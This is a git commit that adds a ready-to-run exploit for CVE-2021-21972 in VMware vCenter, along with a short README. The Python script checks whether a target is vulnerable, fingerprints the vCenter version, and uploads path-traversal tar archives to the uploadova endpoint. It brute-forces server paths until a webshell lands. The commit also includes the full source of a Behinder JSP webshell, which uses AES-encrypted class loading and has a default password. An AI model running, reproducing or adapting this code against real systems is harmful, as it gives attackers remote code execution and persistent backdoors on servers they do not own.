add CVE-2021-21972 RCE

2023-04-07 10:11:44 +08:00 · 2023-04-07 10:11:44 +08:00 · 76344e8c8a
commit 76344e8c8a
parent 04bbc6b65a
5 changed files with 273 additions and 0 deletions
--- a/00-CVE_EXP/CVE-2021-21972/CVE-2021-21972.py
+++ b/00-CVE_EXP/CVE-2021-21972/CVE-2021-21972.py
@ -0,0 +1,260 @@
+#/usr/bin/env python3
+import requests
+import os
+import argparse
+import urllib3
+import tarfile
+import time
+import sys
+
+# remove SSL warning
+urllib3.disable_warnings()
+
+# get script work path
+WORK_PATH = os.path.split(os.path.realpath(__file__))[0]
+
+# init payload path
+WINDOWS_PAYLOAD = WORK_PATH + "/payload/Windows.tar"
+LINUX_DEFAULT_PAYLOAD = WORK_PATH + "/payload/Linux.tar"
+LINUX_RANDOM_PAYLOAD_SOURCE = WORK_PATH + "/payload/Linux/shell.jsp"
+LINUX_RANDOM_PAYLOAD_TARFILE = WORK_PATH + "/payload/Linux_Random.tar"
+
+# init vulnerable url and shell URL
+VUL_URI = "/ui/vropspluginui/rest/services/uploadova"
+WINDOWS_SHELL_URL = "/statsreport/shell.jsp"
+LINUX_SHELL_URL = "/ui/resources/shell.jsp"
+
+# set connect timeout
+TIMEOUT = 10
+
+# set headers
+headers = {}
+headers[
+    "User-Agent"
+] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
+headers["Cache-Control"] = "no-cache"
+headers["Pragma"] = "no-cache"
+
+# get vcenter version,code from @TaroballzChen
+SM_TEMPLATE = b"""<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+      <env:Body>
+      <RetrieveServiceContent xmlns="urn:vim25">
+        <_this type="ServiceInstance">ServiceInstance</_this>
+      </RetrieveServiceContent>
+      </env:Body>
+      </env:Envelope>"""
+
+
+def getValue(sResponse, sTag="vendor"):
+    try:
+        return sResponse.split("<" + sTag + ">")[1].split("</" + sTag + ">")[0]
+    except:
+        pass
+    return ""
+
+
+def getVersion(sURL):
+    oResponse = requests.post(sURL + "/sdk", verify=False, timeout=5, data=SM_TEMPLATE)
+    if oResponse.status_code == 200:
+        sResult = oResponse.text
+        if not "VMware" in getValue(sResult, "vendor"):
+            print("[-] Not a VMware system: " + sURL, "error")
+            return
+        else:
+            sVersion = getValue(sResult, "version")  # e.g. 7.0.0
+            sBuild = getValue(sResult, "build")  # e.g. 15934073
+            sFull = getValue(sResult, "fullName")
+            print("[+] Identified: " + sFull, "good")
+            return sVersion, sBuild
+    print("Not a VMware system: " + sURL, "error")
+    sys.exit()
+
+
+# Utils Functions, Code From @horizon3ai
+def make_traversal_path(path, level=2):
+    traversal = ".." + "/"
+    fullpath = traversal * level + path
+    return fullpath.replace("\\", "/").replace("//", "/")
+
+
+def archive(file, path):
+    tarf = tarfile.open(LINUX_RANDOM_PAYLOAD_TARFILE, "w")
+    fullpath = make_traversal_path(path, level=2)
+    print("[+] Adding " + file + " as " + fullpath + " to archive")
+    tarf.add(file, fullpath)
+    tarf.close()
+
+
+# Tool Functions
+def checkVul(URL):
+    try:
+        res = requests.get(
+            URL + VUL_URI, verify=False, timeout=TIMEOUT, headers=headers
+        )
+        print("[*] Check {URL} is vul ...".format(URL=URL))
+        if res.status_code == 405:
+            print("[!] {URL} IS vul ...".format(URL=URL))
+            return True
+        else:
+            print("[-] {URL} is NOT vul ...".format(URL=URL))
+            return False
+    except:
+        print("[-] {URL} connect failed ...".format(URL=URL))
+        return False
+
+
+def checkShellExist(SHELL_URI):
+    time.sleep(
+        5
+    )  # vCenter copy file to web folder need some time, on most test,5s is good
+    re = requests.get(SHELL_URI, verify=False, timeout=TIMEOUT, headers=headers)
+    if re.status_code == 200:
+        return True
+    else:
+        return False
+
+
+def uploadWindowsPayload(URL):
+    file = {"uploadFile": open(WINDOWS_PAYLOAD, "rb")}
+    re = requests.post(
+        URL + VUL_URI, files=file, verify=False, timeout=TIMEOUT, headers=headers
+    )
+    if "SUCCESS" in re.text:
+        if checkShellExist(URL + WINDOWS_SHELL_URL):
+            print(
+                "[+] Shell exist URL: {url}, default password:rebeyond".format(
+                    url=URL + WINDOWS_SHELL_URL
+                )
+            )
+        else:
+            print("[-] All payload has been upload but not success.")
+    else:
+        print("[-] All payload has been upload but not success.")
+
+
+def uploadLinuxShell(URL):
+    print("[*] Trying linux default payload...")
+    file = {"uploadFile": open(LINUX_DEFAULT_PAYLOAD, "rb")}
+    re = requests.post(
+        URL + VUL_URI, files=file, verify=False, timeout=TIMEOUT, headers=headers
+    )
+    if "SUCCESS" in re.text:
+        print("[+] Shell upload success, now check is shell exist...")
+        if checkShellExist(URL + LINUX_SHELL_URL):
+            print(
+                "[+] Shell exist URL: {URL}, default password:rebeyond".format(
+                    URL=URL + LINUX_SHELL_URL
+                )
+            )
+        else:
+            print(
+                "[-] Shell upload success, BUT NOT EXIST, trying Linux Random payload..."
+            )
+            uploadLinuxRandomPayload(URL)
+    else:
+        print("[-] Shell upload success, BUT NOT EXIST, trying windows payload...")
+        uploadWindowsPayload(URL)
+
+
+def uploadLinuxRandomPayload(URL):
+    for i in range(0, 120):
+        """
+        vCenter will regenerate web folder when vCenter Server restart
+        Attempts to brute force web folders up to 120 times
+        """
+        archive(
+            LINUX_RANDOM_PAYLOAD_SOURCE,
+            "/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/{REPLACE_RANDOM_ID_HERE}/0/h5ngc.war/resources/shell.jsp".format(
+                REPLACE_RANDOM_ID_HERE=i
+            ),
+        )
+        file = {"uploadFile": open(LINUX_RANDOM_PAYLOAD_TARFILE, "rb")}
+        re = requests.post(
+            URL + VUL_URI, files=file, verify=False, timeout=TIMEOUT, headers=headers
+        )
+        if "SUCCESS" in re.text and checkShellExist(URL + LINUX_SHELL_URL):
+            print(
+                "[+] Shell exist URL: {url}, default password:rebeyond".format(
+                    url=URL + LINUX_SHELL_URL
+                )
+            )
+            print(
+                "[+] Found Server Path exists!!!! Try times {REPLACE_RANDOM_ID_HERE}".format(
+                    REPLACE_RANDOM_ID_HERE=i
+                )
+            )
+            exit()
+
+
+def banner():
+    print(
+        """
+   _______      ________    ___   ___ ___  __      ___  __  ___ ______ ___  
+  / ____\\ \\    / /  ____|  |__ \\ / _ \\__ \\/_ |    |__ \\/_ |/ _ \\____  |__ \\ 
+ | |     \\ \\  / /| |__ ______ ) | | | | ) || |______ ) || | (_) |  / /   ) |
+ | |      \\ \\/ / |  __|______/ /| | | |/ / | |______/ / | |\\__, | / /   / / 
+ | |____   \\  /  | |____    / /_| |_| / /_ | |     / /_ | |  / / / /   / /_ 
+  \\_____|   \\/   |______|  |____|\\___/____||_|    |____||_| /_/ /_/   |____|
+                Test On vCenter 6.5 Linux/Windows
+                VMware-VCSA-all-6.7.0-8217866
+                VMware-VIM-all-6.7.0-8217866
+                VMware-VCSA-all-6.5.0-16613358 
+                        By: Sp4ce                                                    
+                        Github:https://github.com/NS-Sp4ce                                                    
+    """
+    )
+
+
+if __name__ == "__main__":
+    banner()
+    parser = argparse.ArgumentParser()
+    parser.add_argument(
+        "-url",
+        "--targeturl",
+        type=str,
+        help="Target URL. e.g: -url 192.168.2.1/-url https://192.168.2.1",
+    )
+    args = parser.parse_args()
+    url = args.targeturl
+    if "https://" not in url:
+        url = "https://" + url
+        if checkVul(url):
+            sVersion, sBuild = getVersion(url)
+            if (
+                int(sVersion.split(".")[0]) == 6
+                and int(sVersion.split(".")[1]) == 7
+                and int(sBuild) >= 13010631
+            ) or (
+                (int(sVersion.split(".")[0]) == 7 and int(sVersion.split(".")[1]) == 0)
+            ):
+                print(
+                    "[-] {TARGET} maybe running vCenter 6.7 U2+, and vCenter 6.7 U2+ running website in memory,so this exp may be not work well on vCenter 6.7 u2+.".format(TARGET=url)
+                )
+                userChoice = input("Do you still want to exploit?(y/n)")
+                if userChoice.lower() == "y":
+                    uploadLinuxShell(url)
+                else:
+                    sys.exit()
+        else:
+            uploadLinuxShell(url)
+    elif checkVul(url):
+        sVersion, sBuild = getVersion(url)
+        if (
+                int(sVersion.split(".")[0]) == 6
+                and int(sVersion.split(".")[1]) == 7
+                and int(sBuild) >= 13010631
+            ) or (
+                (int(sVersion.split(".")[0]) == 7 and int(sVersion.split(".")[1]) == 0)
+            ):
+            print(
+                    "[-] {TARGET} maybe running vCenter 6.7 U2+, and vCenter 6.7 U2+ running website in memory,so this exp may be not work well on vCenter 6.7 u2+.".format(TARGET=url)
+                )
+            userChoice = input("Do you still want to exploit?(y/n)")
+            if userChoice.lower() == "y":
+                uploadLinuxShell(url)
+            else:
+                sys.exit()
+        else:
+            uploadLinuxShell(url)
+    else:
+        parser.print_help()
--- a/00-CVE_EXP/CVE-2021-21972/README.md
+++ b/00-CVE_EXP/CVE-2021-21972/README.md
@ -0,0 +1,12 @@
+# CVE-2021-21972
+
+# Works On
+- VMware-VCSA-all-6.7.0-8217866、VMware-VIM-all-6.7.0-8217866 ✔
+- VMware-VCSA-all-6.5.0-16613358 ✔
+
+# For vCenter6.7 U2+
+vCenter 6.7U2+ running website in memory,so this exp can't work for 6.7 u2+.
+
+# Details
+1. issue url `/ui/vropspluginui/rest/services/uploadova`，完整路径（`https://domain.com/ui/vropspluginui/rest/services/uploadova`）
+2. `payload`文件夹内的`*.tar`文件为冰蝎3 webshell
--- a/00-CVE_EXP/CVE-2021-21972/payload/Linux.tar
+++ b/00-CVE_EXP/CVE-2021-21972/payload/Linux.tar
--- a/00-CVE_EXP/CVE-2021-21972/payload/Linux/shell.jsp
+++ b/00-CVE_EXP/CVE-2021-21972/payload/Linux/shell.jsp
@ -0,0 +1 @@
+<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>
--- a/00-CVE_EXP/CVE-2021-21972/payload/Windows.tar
+++ b/00-CVE_EXP/CVE-2021-21972/payload/Windows.tar
				`@ -0,0 +1 @@`
				<%@page import="java.util.,javax.crypto.,javax.crypto.spec."%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/1kdnwbry2LyI7pyA*/%>